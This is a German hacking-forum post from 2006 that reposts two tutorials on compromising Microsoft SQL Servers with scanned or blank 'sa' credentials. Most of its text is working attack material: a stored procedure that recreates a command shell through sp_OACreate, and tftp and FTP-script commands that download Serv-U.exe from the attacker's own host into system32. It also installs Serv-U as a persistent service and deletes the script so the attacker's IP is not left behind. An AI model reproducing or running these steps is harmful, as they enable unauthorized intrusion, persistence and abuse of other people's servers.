Verfügbare Informationen zu "Sql Hacks Rehacks"
Qualität des Beitrags: Beteiligte Poster: 4dministr4t0r Forum: Newcomer - Board Forenbeschreibung: Forum für alle "Newcomer" (Alter, Geschlecht etc. egal), die sich im Bereich Systemsicherheit weiterbilden wollen. Chatten könnt Ihr am Ende der Seite! aus dem Unterforum: Tutorials (Info-Texte) Antworten: 1 Forum gestartet am: Samstag 23.12.2006 Sprache: deutsch Link zum Originaltopic: Sql Hacks Rehacks Letzte Antwort: vor 16 Jahren, 2 Monaten, 31 Tagen, 19 Stunden, 49 Minuten
Alle Beiträge und Antworten zu "Sql Hacks Rehacks"
Re: Sql Hacks Rehacks
4dministr4t0r - 26.12.2006, 20:35Sql Hacks Rehacks
##############################################################################################
Alle hier geposteten Tutorials sind im www zu finden und nicht von mir. Sie werden unverändert hier dargestellt.
Wir weisen ausdrücklich darauf hin, daß wir mit dieser Ansammlung nicht zu Straftaten aufrufen oder animieren wollen!!!
Alle Tutorials dienen ausschließlich zu Informationszwecken.
Solltest Du ein von Dir erstelltes Tutorial hier finden und mit der Veröffentlichung bei Hackressort nicht einverstanden sein, schick mir eine PM oder Email.
Das Tutorial wird dann entfernt.
Hackressort-Team
##############################################################################################
SQL Haxx Tutorial
#########################################################
#########################
# #
# MsSQL Hack Tutorial #
# Written bY h4p0 #
# #
# Server : irc.chillfactory.net #
# Port : 6667 #
# Channel: #ManiaC-FXP #
# #
###################################################
#########################
##########################
# Als Aller Erstes!! #
# #
# Dieses Tutorial dient #
# nur zu Lern Zwecken .. #
# Ich Hafte NICHT für #
# Entstehende Schäden #
# oder sonst etwas!! #
##########################
Folgendes wird Benötigt:
1.) MsSQL Scannz z.B ( Found MSSQL Account 123.234.456.456 sa/[Null] )
2.) Configurierte Serv-U.ini
3.) Serv-U.exe
4.) Einen HomeFTP oder nen Str0 bzw. Pub zum Upload der Serv-U Filez
5.) SQLExec.exe ( Am besten Die mit dem Apfel Icon )
6.) Zeit…
*Hacken eines Secured SQL Servers*
*Tutorial übersetzt und verbessert von :Frost*
*Benutzung auf eigene Gefahr*
*********************************************************************
1)Index
2)Benötigte TOols
3)Infizieren eigenes Unterfangen
4)Ausfürhren eigenes unterfangen
1)
So hier dieses Tutoarial Bringt euch bi Secured MSSQL
server zu haxxorn aber ihr solltet bedenken das nur 55%
der server zurechekcen sind.
2)
- einen Mssql server mit User/pw
- SQLBrowser.exe
- evtl nc.exe
- tftp !!! Solarwinds TFTP SERVER ist gut smile
- Unser script ( http://www.pstruh.cz/tips/detpg_cmdshell.htm )
So Downloade und Starte SQLBrower.exe. An der rechten seite Enter IP USER und PW.
Auf der Linken seite das text feld wo steht dir xp_cmdshell “dir c:\ ist das Command eingabe Feld.
Nur Geben Wir das Script ins Command feld hinein http://www.pstruh.cz/tips/detpg_cmdshell.htm
Oder nehmt das hier
———————————————
CREATE PROCEDURE MeineNeueCMDSHELL(@cmd varchar(255), @Wait int = 0) AS
–Create WScript.Shell object
DECLARE @result int, @OLEResult int, @RunResult int
DECLARE @ShellID int
EXECUTE @OLEResult = sp_OACreate ‘WScript.Shell’, @ShellID OUT
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR (’CreateObject %0X’, 14, 1, @OLEResult)
EXECUTE @OLEResult = sp_OAMethod @ShellID, ‘Run’, Null, @cmd, 0, @Wait
IF @OLEResult <> 0 SELECT @result = @OLEResult
IF @OLEResult <> 0 RAISERROR (’Run %0X’, 14, 1, @OLEResult)
–If @OLEResult <> 0 EXEC sp_displayoaerrorinfo @ShellID, @OLEResult
EXECUTE @OLEResult = sp_OADestroy @ShellID
return @result
—————————————————–
Anstatt MeineNeueCMDSHELL am anfang könnt ihr auch Irgendwas anderes nehmen!
Jetzt Klickt auf Connect und Schneller als du Glaubst *g* Bist du Connecten !
Jetzt Können Mehrere Fehler kommen :
- Bla bla did not Return any Results , Jaja Egal Es hat Geklappt Geh zum Nächsten schritt!
- Anderer Fehler , Es hat nicht geklappt
- Wenn kommt Execute oder Create permission appears , dann ist es nicht möglich ihn zu rehacken !
- Syntax error on line ….. Jaja Das wird immerkommen WENN DU DIESES NICHT LIEST : IMMER SQL BOWER.exe
- Maximiert Benutzen !
4)
Starten eigener Befehle
Ihr müsst das gleiche Nehmen SQL Bower Zunge raus
Paar Befehle zur erläuterung :
MeineNeueCMDSHELL “tftp 129.0.0.0 59 get Servudaemon.exe”
MeineNeueCMDSHELL “cmd.exe /c echo open >> temp”
MeineNeueCMDSHELL “cmd.exe servudaemon.exe”
Usw usw großes Grinsen
Dir funzt leider nicht ! Aber man kann ja NC.exe Uppen und starten smile
————————————————————
Ein paar Tipps
Das einzige Problem ist hierbei allerdings nur das man den Befehl nicht sieht wenn er fertig ist,
und das man nichts anzeigen lassen kann wie type , dir usw.
Und wenn ihr einen Error Namens 8007000 Erhaltet dann bedeutet das , das die datei oder Programm
was ihr ausfürhen wolltet NICHT existiert.
Schlusswort :
1.Ja ich bins Frost und Ich habe euch das Geile TUtorial Übersetzt smile
2.Bitte Nur der Crew und engen Freunden Geben Freude
So wirds Gemacht…
1.) SQLExec Starten!
2.) Bei Host schreibt Ihr die IP vom SQL Scan rein,
In User kommt in FAST Jeden Fall Sa rein und
In Pass schreibt Ihr Das Passwort vom SQL Scan rein Bei [Null] einfach Freilassen!
3.) Guckt Immer Erst Wieviel Space Auf dem Server noch Vorhanden ist
Das macht ihr so: DIR c:\ Zeigt an Wieviel Auf Pladde c: noch Frei ist!
Dann könnt Ihr noch Gucken z.B DIR d:\ , DIR e:\ usw.
4.) Denn müsst Ihr ein GET Script erstellen Um Die Serv-U Filez von Euren HomeFTP,Str0 oder Pub
auf den Server zu holen ,das macht Ihr wie Folgt:
ECHO OPEN [IP von HomeFTP,Str0,oder Pub] [Port]>>FTP.txt .. Bedeutet Das er eine Verbindung Zum HomeFTP Öffnet
ECHO [Username des HomeFTP Accounts]>>FTP.txt .. Bedeutet Das ihr den Usernamen Des HomeFTP Accounts Angibt
ECHO BINARY>>sql.txt .. Bedeutet Das ihr das Passwort Des HomeFTP Accounts Angibt
ECHO lcd c:\WINNT\System32>>FTP.txt .. Bedeutet Das Er Die Filez Die ihr Hochladet Ins SYStemroot Ladet
ECHO GET Serv-U.exe>>FTP.txt .. Bedeutet Das er Die Serv-U.exe holen soll
ECHO GET Serv-U.ini>>FTP.txt .. Bedeutet Das er Die Serv-u.ini holen soll
ECHO Quit>>FTP.txt .. Bedeutet Das Er von Eurem FTP Disconectet Wen er Die filez hat
Beißpiel Euer Home Hat die IP 111.222.333.444 , den Port 21 , den Usernamen Test und das pw Test
Echo Open 111.222.333.444 21>>FTP.txt
Echo Test>>FTP.txt
Echo Test>>FTP.txt
Echo Binary>>FTP.txt
Echo Lcd c:\winnt\System32>>FTP.txt
Echo GET Serv-U.exe>>FTP.txt
Echo GET Serv-U.ini>>FTP.txt
Echo Quit>>FTP.txt
5.) So Dann Habt Ihr das GET Script schonmal Fertig,um nun Die Filez zu
Holen gibt ein: FTP.exe -s:FTP.txt Dann schmiert SQLExec ab Aber NICHT schließen
sondern Warten bis Das Prog wieder Reagiert..
6.) Wenns Dann wieder Reagiert Löscht Ihr Als aller Erstes mal Das GET Script
Ansonsten Hinterlasst Ihr eure Ip ,Das macht Ihr so: DEL FTP.txt Soweit sogut!
7.) Ihr Tragt Serv-U als Service ein Damit euer Server auch nach Reboot Besteht!
Das macht ihr so: c:\Winnt\system32\Serv-U.exe /i
Wenn der Server Statt Winnt Windows hat, denn c:\windows\system32…
8.) Das Starten Der Serv-U.exe .. Das geht so: NET Start Serv-u
Wenn es Nicht Geht Probiert mal Zuerst NET STOP Serv-u und danach Wieder Start
So nun Ist der Server Fertig und Ihr könnt mit Eurem
FTP-Programm Drauf Conecten und Fillen Lassen großes Grinsen
Am besten wäre es noch wenn Ihr den Server Securen Würdet aber
Das ist wieder eine Andere Sache
Bei Fragen Oder wenn Ihr ein Bischen lernen bzw Chatten wollt Join unseren Channel
Und nun Viel Spaß noch!
ist wieder nicht von mir um den autro zu finden solltet ihr vlt den genannten irc chan joinen ;-)
Mit folgendem Code, können Sie den Beitrag ganz bequem auf ihrer Homepage verlinken
Weitere Beiträge aus dem Forum Newcomer - Board
Anfänger Tutorial - gepostet von 4dministr4t0r am Montag 25.12.2006
Steinator - gepostet von Steinator am Samstag 10.02.2007
Hallo an die Runde - gepostet von sebuka am Mittwoch 21.03.2007
Ähnliche Beiträge wie "Sql Hacks Rehacks"
Hacks Lebensgeschichte (auch trauergeschichte genannt) - Hack (Dienstag 10.05.2005)
Die Aktuelsten Pokemon S/G/K hacks - romking (Sonntag 29.01.2006)
Trojaner und andere Hacks - Memoire (Dienstag 13.02.2007)
Google - Hacks - 4dministr4t0r (Montag 25.12.2006)
CS 1.6, CSS Hacks - [GodTM]_kanYe (Mittwoch 13.09.2006)
Diablo2 - tools , hacks , downloads - azumit (Donnerstag 25.05.2006)
Hacks - darkraistlin (Dienstag 23.01.2007)
Cheats,Hacks,Downloads - cherrymoon (Freitag 08.02.2008)
MSN Messenger 6.x Hacks! - <=HHG=>sSwizZz (Sonntag 16.05.2004)
eAMirrows Txt Svn Sql - keny16 (Mittwoch 24.05.2006)
